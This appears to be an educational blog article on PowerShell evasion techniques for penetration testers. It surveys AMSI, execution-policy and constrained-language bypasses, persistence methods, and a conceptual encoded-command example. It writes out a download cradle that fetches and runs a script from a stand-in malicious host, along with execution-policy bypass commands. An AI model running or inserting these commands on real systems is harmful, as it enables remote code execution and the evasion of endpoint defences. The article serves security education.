PowerShell for Pentesters: Bypass Techniques and Examples

PowerShell, a powerful task automation and configuration management framework from Microsoft, has become a staple in modern IT environments. Its flexibility, deep integration with the Windows operating system, and object-oriented nature make it an invaluable tool for system administrators. Unfortunately, these same features also make PowerShell an attractive tool for malicious actors. Pentesters, ethical hackers who proactively assess system vulnerabilities, leverage PowerShell to simulate real-world attacks and uncover security weaknesses. This article explores various PowerShell bypass techniques employed by pentesters, providing examples and explanations to illuminate their effectiveness and potential impact.

Understanding the Defender’s Arsenal:

Before delving into bypass techniques, it’s crucial to understand the defensive mechanisms pentesters are trying to circumvent. Windows Defender, along with other security solutions, employs various strategies to detect and mitigate malicious PowerShell activity:

• Script Block Logging: Records the execution of PowerShell scripts, providing valuable forensic information.
• Antivirus Scanning: Scans PowerShell scripts for known malicious signatures and patterns.
• Constrained Language Mode: Restricts access to sensitive cmdlets and .NET classes, limiting the potential damage.
• Application Whitelisting: Prevents unauthorized applications, including potentially malicious PowerShell scripts, from running.
• AMSI (Antimalware Scan Interface): Provides real-time scanning of script content before execution.

PowerShell Bypass Techniques:

Pentesters employ various techniques to bypass these security measures, often chaining them together for increased effectiveness:

1. Encoding and Obfuscation:

Encoding and obfuscation techniques aim to disguise malicious code, making it harder for signature-based detection mechanisms to identify it.

• Base64 Encoding: A common technique that converts the script into a Base64 string, which can then be decoded and executed. $EncodedCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Write-Host "Hello, World!"')); powershell.exe -EncodedCommand $EncodedCommand
• XOR Encoding: Applies a bitwise XOR operation to the script with a key, obscuring its content.
• String Manipulation: Utilizing techniques like string concatenation, reversing, and character substitution to alter the script’s appearance.
• Special Characters and Formatting: Using backticks, escape characters, and unconventional formatting to disrupt parsing and avoid detection.

2. Execution Policy Bypass:

PowerShell’s execution policy restricts script execution. Pentesters employ several methods to bypass this policy:

• Bypass: powershell.exe -ExecutionPolicy Bypass -File malicious.ps1
• Unrestricted: powershell.exe -ExecutionPolicy Unrestricted -File malicious.ps1
• Command Injection: Injecting PowerShell commands directly into other processes, bypassing the execution policy altogether.

3. Direct Invocation of System.Management.Automation:

Bypassing the powershell.exe process and directly invoking the underlying .NET classes allows attackers to execute commands without triggering certain detection mechanisms. This technique involves loading the System.Management.Automation assembly and creating a PowerShell object to execute commands.

4. AMSI Bypass:

AMSI poses a significant hurdle for attackers. Several techniques exist to bypass it, including:

• Patching AMSI: Modifying the AMSI DLL in memory to disable its scanning functionality.
• Obfuscating Script Content: Utilizing techniques like dynamic code generation and string manipulation to avoid pattern matching.
• Utilizing AMSI Bypass Scripts: Publicly available scripts demonstrate various methods for disabling or bypassing AMSI.

5. Constrained Language Mode Bypass:

Bypassing Constrained Language Mode allows access to powerful cmdlets and .NET classes. Techniques include:

• Utilizing Reflection: Using reflection to access restricted methods and properties.
• Exploiting Software Vulnerabilities: Leveraging vulnerabilities in specific applications to escape the constrained environment.

6. Downloading and Executing Remote Code (Download Cradle):

This technique involves downloading and executing malicious code directly from a remote server. Techniques include:

• Invoke-WebRequest: Using Invoke-WebRequest to retrieve a script and then executing it. iex (New-Object Net.WebClient).DownloadString('http://malicious.com/malware.ps1')
• Bitsadmin: Utilizing bitsadmin to download files discreetly.

7. Living off the Land Binaries (LOLBins):

Utilizing legitimate system binaries to execute malicious code helps blend in with normal system activity. Examples include:

• Msbuild.exe: Using msbuild.exe to compile and execute C# code that invokes PowerShell commands.
• InstallUtil.exe: Using InstallUtil.exe to execute malicious code embedded within a .NET assembly.

8. Registry Persistence:

Storing malicious PowerShell scripts within registry keys allows for persistent execution upon system startup or user login.

9. WMI (Windows Management Instrumentation):

WMI can be used to execute PowerShell scripts remotely and locally. This offers a powerful mechanism for persistence and lateral movement.

10. Scheduled Tasks:

Creating scheduled tasks that execute PowerShell scripts allows attackers to maintain persistent access and automate malicious activities.

Example: Encoded Command with AMSI Bypass (Conceptual):

This simplified example demonstrates the combination of encoding and a potential (and highly simplified) AMSI bypass approach. Note: This is for illustrative purposes only. Actual AMSI bypass techniques are more complex and constantly evolving.

“`powershell

Simplified conceptual example. Do not use in production or for malicious purposes.

Assume a function ‘Bypass-AMSI’ exists that disables AMSI. This is simplified for demonstration.

Bypass-AMSI

Base64 encoded command to write to a file

$EncodedCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(“Out-File -FilePath C:\malicious.txt -InputObject ‘Malicious Content'”))

Decode and execute

powershell.exe -EncodedCommand $EncodedCommand
“`

Conclusion:

PowerShell’s power and flexibility make it a double-edged sword. While invaluable for system administration, it also presents a significant security risk when misused. Understanding the bypass techniques employed by pentesters is crucial for defenders to strengthen their security posture and effectively mitigate potential threats. By staying up-to-date on the latest techniques and implementing robust security controls, organizations can effectively defend against PowerShell-based attacks. Remember that the examples provided are for educational purposes only and should not be used for malicious activities. Ethical hacking and penetration testing should always be conducted with proper authorization and within legal boundaries.